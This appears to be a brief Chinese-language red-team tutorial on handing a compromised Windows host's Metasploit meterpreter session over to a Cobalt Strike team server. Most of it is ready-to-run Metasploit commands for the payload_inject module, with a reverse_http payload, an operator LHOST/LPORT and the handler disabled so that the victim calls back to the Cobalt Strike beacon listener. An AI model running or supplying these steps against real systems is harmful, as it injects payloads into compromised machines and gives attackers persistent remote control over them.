前提:MFS已经获取到session,可以进入metepreter,现在需要使用cobaltstrike进行图形化管理或团队协作。
cobaltstrike起一个beacon监听
如使用:windows/beacon_http/reverse_http
设置好host和port之后启动监听。
MSF中使用
use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set payload windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.3.117
msf exploit(payload_inject) > set LPORT 10001
msf exploit(payload_inject) > set SESSION 1
注:set DisablePayloadHandler true 作用是msf不监听,代表是用来返给其他监听的
都设置好后
msf exploit(payload_inject) > run
去CS端查看结果
cs成功接收到msf中的session